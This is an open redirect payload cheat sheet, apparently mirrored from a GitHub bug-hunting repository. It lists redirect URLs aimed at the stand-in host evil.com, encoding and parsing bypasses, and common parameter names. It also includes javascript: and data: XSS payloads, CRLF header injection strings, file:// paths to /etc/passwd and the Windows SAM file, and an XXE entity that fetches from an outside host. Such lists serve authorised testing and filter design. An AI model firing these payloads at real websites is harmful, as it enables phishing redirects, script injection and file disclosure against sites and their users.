Mirror of https://github.com/0x5t4l1n/hunting.git, synced 2026-05-26 11:35:51 +00:00 (commit ba72efbc5e)
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
223 lines
4.7 KiB
Plaintext
# Open Redirect Payloads

## Basic External URLs

http://evil.com
https://evil.com
//evil.com
///evil.com
////evil.com
http://evil.com/
https://evil.com/
//evil.com/

## Common Parameter Names to Test

?url=http://evil.com
?redirect=http://evil.com
?next=http://evil.com
?return=http://evil.com
?continue=http://evil.com
?destination=http://evil.com
?redir=http://evil.com
?returnTo=http://evil.com
?returnUrl=http://evil.com
?redirectUrl=http://evil.com
?redirect_uri=http://evil.com
?callback=http://evil.com
?return_to=http://evil.com
?goto=http://evil.com
?target=http://evil.com
?link=http://evil.com
?out=http://evil.com
?view=http://evil.com
?to=http://evil.com
?image_url=http://evil.com
?go=http://evil.com
?file=http://evil.com
?val=http://evil.com
?validate=http://evil.com
?domain=http://evil.com
?checkout_url=http://evil.com
?success=http://evil.com
?failure=http://evil.com
?login=http://evil.com
?logout=http://evil.com

## Protocol Manipulation

///evil.com
////evil.com
/////evil.com
\\evil.com
\\\\evil.com
\/\/evil.com
/\/\/evil.com

## Using @ Symbol

http://legitimate.com@evil.com
https://legitimate.com@evil.com
//legitimate.com@evil.com
http://legitimate.com%40evil.com

## URL Encoding

http%3A%2F%2Fevil.com
https%3A%2F%2Fevil.com
%2F%2Fevil.com
http%3A%2F%2Fevil%2Ecom
https%3A%2F%2Fevil%2Ecom

## Double URL Encoding

http%253A%252F%252Fevil.com
https%253A%252F%252Fevil.com
%252F%252Fevil.com

## Unicode/UTF-8 Encoding

http://evil%E3%80%82com
//evil%E3%80%82com
//evil%u2215com
//evil%u2216com

## Null Byte Bypass

http://evil.com%00.legitimate.com
https://evil.com%00.legitimate.com
//evil.com%00.legitimate.com

## Whitespace Bypass

http://evil.com%20
http://evil.com%09
http://evil.com%0a
http://evil.com%0d

## Using Localhost/Internal IPs

http://127.0.0.1
http://localhost
http://0.0.0.0
http://[::1]
http://2130706433 (decimal IP)
http://0x7f000001 (hex IP)

## Domain Manipulation

http://evil.com.legitimate.com
http://legitimate.com.evil.com
http://evil-legitimate.com
http://legitimate-evil.com

## Subdomain Takeover

http://subdomain.legitimate.com
//subdomain.legitimate.com

## XSS via Redirect (javascript: protocol)

javascript:alert(1)
javascript:alert('XSS')
javascript://evil.com%0Aalert(1)
javascript:eval(atob('YWxlcnQoMSk='))

## Data URI

data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

## File Protocol

file:///etc/passwd
file://C:/Windows/System32/config/sam

## Wildcard Bypasses

http://evil*.com
http://*.evil.com

## Bypass using Backslash

http:\\evil.com
https:\\evil.com

## Using Question Mark

http://legitimate.com?evil.com
http://legitimate.com?@evil.com

## Using Hash

http://legitimate.com#evil.com
http://legitimate.com#@evil.com

## Bypass with Partial URL

evil.com
//evil.com
///evil.com

## Using Different TLDs

http://evil.co
http://evil.io
http://evil.net
http://evil.org

## CRLF Injection for Header Manipulation

%0d%0aLocation:%20http://evil.com
%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:text/html%0d%0aContent-Length:25%0d%0a%0d%0a<script>alert(1)</script>
%0aLocation:%20http://evil.com

## IPv6 Addresses

http://[::ffff:7f00:1]
http://[0:0:0:0:0:ffff:127.0.0.1]

## Punycode/IDN Homograph

http://xn--e1awd7f.com (example using Cyrillic characters)
http://xn--80a7a.com

## Using Subpaths

http://legitimate.com/redirect?url=http://evil.com
http://legitimate.com/redirect?url=//evil.com
http://legitimate.com/redirect?url=///evil.com

## Combined Techniques

http://legitimate.com@evil.com?redirect=http://evil.com
//legitimate.com@evil.com%2F
http://evil.com%23legitimate.com
http://evil.com%3Flegitimate.com

## Special Characters

http://evil。com (Unicode ideographic full stop U+3002, a full-width dot)
http://evil%E3%80%82com (the same character percent-encoded as UTF-8)

## Bypass with URL Fragments

#http://evil.com
#//evil.com

## Using Meta Refresh

<meta http-equiv="refresh" content="0;url=http://evil.com">

## Mixed Case to Bypass Filters

HTtp://evil.com
HttPs://evil.com
hTTp://evil.com

## Decimal Encoding

http://1.2.3.4 (dotted-decimal IP notation)

## Octal Encoding

http://0177.0.0.01 (octal for 127.0.0.1)

## Using Port Numbers

http://evil.com:80
http://evil.com:443
http://evil.com:8080

## Path Confusion

/http://evil.com
\/http://evil.com
//http://evil.com

## Relative Path Manipulation

../../../evil.com
..%2F..%2F..%2Fevil.com

## Using Open Graph Protocol

http://legitimate.com/og?image=http://evil.com/image.jpg

## Flash-based Redirect

http://legitimate.com/flash.swf?url=http://evil.com

## PDF-based Redirect

http://legitimate.com/file.pdf#http://evil.com

## Using Referer Header

Referer: http://evil.com

## XML External Entity (XXE) for Redirect

<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://evil.com">]><foo>&xxe;</foo>